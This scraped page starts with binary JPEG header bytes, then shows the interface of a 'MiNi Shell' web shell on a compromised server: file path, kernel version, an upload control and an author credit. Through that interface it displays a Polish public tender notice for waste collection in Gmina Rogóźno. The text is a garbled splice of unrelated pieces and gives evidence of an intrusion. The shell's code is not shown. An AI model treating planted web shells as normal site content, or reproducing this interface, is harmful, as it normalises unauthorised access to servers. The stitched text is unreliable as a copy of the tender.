JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220401/0010612701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Rogóźno w terminie od 01.07.2022 r. do 30.06.2023 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ROGÓŹNO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118661</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rogóźno 91B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rogóźno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-318</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@rogozno.ug.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rogozno.ug.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Rogóźno w terminie od 01.07.2022 r. do 30.06.2023 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-02a4bd37-b185-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00106127</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016606/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości, na któych zamieszkują mieszkańcy w terenu Gminy Rogóźno w terminie od 01.07.2022 r. do 30.06.2023 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami <br/>odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl<br/>oraz ePUAP-u dostępnego pod adresem: https://epuap.gov.pl/wps/portal.<br/>4.2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi <br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących <br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza <br/>do komunikacji”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, <br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu <br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z <br/>elektronicznej platformy usług administracji publicznej (ePUAP). Maksymalny rozmiar plików <br/>przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania <br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>4.4. Wykonawca składa ofertę/wniosek o dopuszczenie do udziału w postępowaniu, dalej „wniosek” za <br/>pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na <br/>ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez <br/>Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania. <br/>W formularzu oferty/wniosku Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na której <br/>prowadzona będzie korespondencja związana z postępowaniem.<br/>4.5. Zasady składania ofert oraz dokumentów składanych wraz z ofertą oraz wymagania techniczne <br/>i organizacyjne ich wysyłania opisane zostały w „Instrukcji użytkownika”, dostępnej na stronie: <br/>https://miniportal.uzp.gov.pl/. Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją <br/>i postępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia, <br/>w szczególności składając ofertę, akceptuje zasady korzystania z systemu miniPortal, które zostały <br/>wskazane w Instrukcji użytkownika i SWZ. W celu korzystania z systemu miniPortal konieczne jest <br/>_________________________________________________________________________________<br/>str. 6<br/>dysponowanie przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet. <br/>Aplikacja działa tylko na platformie Windows i wymaga .NET Framework 4.5. W przypadku <br/>korzystania z urządzeń mobilnych oraz Mac lub Linux, dostęp do wszystkich funkcjonalności systemu <br/>miniPortal może być ograniczony.<br/>4.6. System dostępny jest za pośrednictwem następujących przeglądarek internetowych: -Microsoft <br/>Internet Explorer od wersji 9.0, - Mozilla Firefox od wersji 15, -Google Chrome od wersji 20. 5. <br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz <br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>4.7. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub <br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich <br/>przekazania na ePUAP</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WPA.271.1.9.WPA-I.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest:<br/>2.1.1. Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości, na <br/>których zamieszkują mieszkańcy z terenu Gminy Rogóźno;<br/>_________________________________________________________________________________<br/>str. 3<br/>2.1.2. Przeprowadzenie co najmniej dwóch zbiórek w ciągu roku (jedna zbiórka w okresie wiosennym <br/>i jedna zbiórka w okresie jesiennym) pozostałych selektywnie zbieranych odpadów <br/>komunalnych od właścicieli nieruchomości zamieszkałych, we wszystkich 13 miejscowościach <br/>na terenie gminy Rogóźno, w mobilnym punkcie selektywnej zbiórki odpadów komunalnych. <br/>Przedmiotem zbiórek będzie: sprzęt elektryczny i elektroniczny, akumulatory, chemikalia, opony, <br/>meble i inne odpady wielkogabarytowe oraz inne odpady zmieszane pochodzące z budowy, <br/>remontu i demontażu. .<br/>2.1.3. Wyposażenie nieruchomości w pojemniki służące do zbierania odpadów komunalnych.<br/>2.1.4. Opracowanie i dostarczenie właścicielom nieruchomości zamieszkałych, harmonogramu <br/>odbierania odpadów oraz ulotkę edukacyjną zawierającą informacje o szczegółowym sposobie <br/>segregowania odpadów komunalnych ze wskazaniem, co można, a czego nie można wrzucać do <br/>poszczególnych pojemników.<br/>2.2. Przedmiotem zamówienia nie jest:<br/>2.2.1. Odbiór i zagospodarowanie przeterminowanych leków oraz baterii i akumulatorów przenośnych, <br/>a także odpadów komunalnych z koszy ulicznych przy drogach publicznych;<br/>2.2.2. Utrzymanie pojemników służących do zbierania odpadów komunalnych w odpowiednim stanie sanitarnym i porządkowym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-07-01 do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wyposażenia nieruchomości w pojemniki do odpadów komunalnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zapewnienie samochodu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczące:<br/>16.1.1. Zdolności do występowania w obrocie gospodarczym- Zamawiający nie określa warunków <br/>w ww. zakresie;<br/>16.1.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika <br/>to z odrębnych przepisów- Warunek ten zostanie spełniony, jeżeli Wykonawca:<br/>16.1.2.1.posiada nadany przez Marszałka województwa numer rejestrowy, potwierdzający <br/>rejestrację w bazie danych o produktach i opakowaniach oraz o gospodarce odpadami <br/>(tzw. Baza BDO);<br/>16.1.2.2.posiada wpis do Rejestru działalności regulowanej w zakresie odbierania odpadów <br/>komunalnych od właścicieli nieruchomości z terenu Gminy Rogóźno zgodnie <br/>_________________________________________________________________________________<br/>str. 12<br/>z wymogami ustawy z dnia 13 września 1996 o utrzymaniu czystości i porządku <br/>w gminach (Dz.U. z 2021 r. poz. 888, 1648, 2151).<br/>16.1.3. Sytuacji ekonomicznej lub finansowej- Zamawiający nie określa warunków w ww. zakresie<br/>16.1.4. Zdolności technicznej lub zawodowej- Warunek ten zostanie spełniony, jeżeli wykonawca <br/>wykaże:<br/>16.1.4.1.iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał lub wykonuje <br/>jedną usługę odbierania i zagospodarowania odpadów komunalnych, wraz <br/>z załączeniem dowodów świadczących o tym, że usługa została wykonana lub jest <br/>wykonywana należycie;<br/>16.1.4.2.iż na czas realizacji zamówienia będzie dysponował bazą magazynowo- transportową <br/>usytuowaną na terenie gminy Rogóźno lub w odległości nie większej niż 60 km od <br/>granicy gminy. Baza powinna być usytuowana na terenie, do którego Wykonawca <br/>posiada tytuł prawny. Baza magazynowo - transportowa winna spełniać wymagania, <br/>o których mowa w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. <br/>w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od <br/>właścicieli nieruchomości,<br/>16.1.4.3.iż na czas realizacji zamówienia będzie dysponował co najmniej jednym pojazdem <br/>przystosowanym do odbierania zmieszanych odpadów komunalnych oraz co najmniej <br/>jednym pojazdem przystosowanymi do odbierania selektywnie zebranych odpadów<br/>komunalnych. Pojazdy muszą być trwale i czytelnie oznakowane, w widocznym <br/>miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu <br/>odbierającego odpady komunalne od właścicieli nieruchomości. Pojazdy winny <br/>spełniać wymagania o których mowa w rozporządzeniu Ministra Środowiska z dnia 11 <br/>stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów <br/>komunalnych od właścicieli nieruchomości. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawcy zobowiązani są do wniesienia wadium w wysokości 12.300,00 PLN (słownie: <br/>dwanaście tysięcy trzysta złotych 00/100). Wadium należy wnieść przed upływem terminu <br/>składania ofert.<br/>21.2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>21.2.1. pieniądzu;<br/>21.2.2. poręczeniach bankowych;<br/>21.2.3. gwarancjach bankowych;<br/>21.2.4. gwarancjach ubezpieczeniowych;<br/>_________________________________________________________________________________<br/>str. 15<br/>21.2.5. poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia <br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. <br/>poz. 299 ze zm.).<br/>21.3. Wadium wnoszone w pieniądzu należy przelać na rachunek bankowy Urzędu Gminy Rogóźno <br/>– BS Łasin 67 9500 0008 0000 0097 2000 0014. W tytule należy napisać: „Wadium – odbiór odpadów”.<br/>21.4. Za skuteczne wniesione wadium w pieniądzu uznaje się takie wadium, które zostanie <br/>zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>21.5. Jeżeli wadium jest składane w formie gwarancji lub poręczenia Wykonawca przekazuje <br/>Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej- przed upływem terminu <br/>składania ofert. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, <br/>lub poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze <br/>pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i powinno <br/>zawierać następujące elementy:<br/>21.5.1. Nazwy: dającego zlecenie (Wykonawcy), beneficjenta gwarancji/ poręczenia (Zamawiającego),<br/>gwaranta lub poręczyciela oraz wskazanie ich siedzib;<br/>21.5.2. kwotę wadium;<br/>21.5.3. termin ważności gwarancji/ poręczenia w formule: &#34;od dnia ............. - do dnia ...................&#34;;<br/>21.5.4. zobowiązanie gwaranta/ poręczyciela do zapłaty kwoty wskazanej w gwarancji/ poręczeniu na <br/>pierwsze żądanie Zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach <br/>ustawy.<br/>21.6. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia <br/>upływu terminu związania z ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust 2 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy zgodnie z art. 454-455 ustawy Pzp. <br/>2.	Zamawiający dopuszcza możliwość zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie przedmiotu, sposobu wykonania umowy, terminu lub wynagrodzenia. Zmiana postanowień niniejszej umowy, może nastąpić w przypadku wystąpienia, co najmniej jednej okoliczności spośród wymienionych poniżej z uwzględnieniem wskazanych warunków jej wprowadzenia:<br/>1)	zmiany przepisów prawa mających wpływ na realizację przedmiotu umowy albo świadczenia<br/>jednej lub obu stron,<br/>2)	w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego a nie powoduje zwiększenia wartości zamówienia;<br/>3)	w przypadku zmiany przepisów prawa, w tym w szczególności: Ustawy o utrzymaniu czystości i porządku w gminach, Ustawy o odpadach oraz wydania rozporządzeń wykonawczych do tych ustaw; także <br/>w przypadku zmiany, uchylenia lub wprowadzenia nowego brzmienia Regulaminu utrzymania czystości <br/>i porządku na terenie Gminy Rogóźno (Uchwała nr XXVII/156/2017 Rady Gminy Rogóźno z dnia 24 października 2017 r.) – przy czym zmiana umowy będzie polegała na jej dostosowaniu do zmian stanu prawnego będących konsekwencją zmiany, uchylenia lub wprowadzenia nowego brzmienia wymienionych aktów;<br/>4)	w przypadku konieczności zmiany częstotliwości odbioru odpadów komunalnych i wprowadzenia nowych frakcji odpadów selektywnie zbieranych, na skutek okoliczności, które nie były znane w chwili zawarcia umowy,<br/>5)	w przypadku wystąpienia obiektywnych okoliczności, których Zamawiający nie mógł przewidzieć na etapie przygotowania postępowania, a które powodują, że wykonanie przedmiotu zamówienia bez ograniczenia zakresu zamówienia, powodowałoby dla Zamawiającego niekorzystne skutki z uwagi na zamierzony cel realizacji przedmiotu zamówienia i związane z tym racjonalne wydatkowanie środków publicznych,<br/>6)	w przypadku wprowadzenia zmian w stosunku do Opisu Przedmiotu Zamówienia w zakresie wykonania usług niewykraczających poza zakres przedmiotu zamówienia, w sytuacji konieczności zwiększenia usprawnienia procesu realizacji zamówienia;<br/>7)	w przypadku konieczności zmiany zaplecza, którym dysponuje Wykonawca, o którym mowa w §2 ust. 8 lub 9, o ile nowe zaplecze spełnia warunki udziału w postępowaniu <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-07 23:59</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-08 08:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com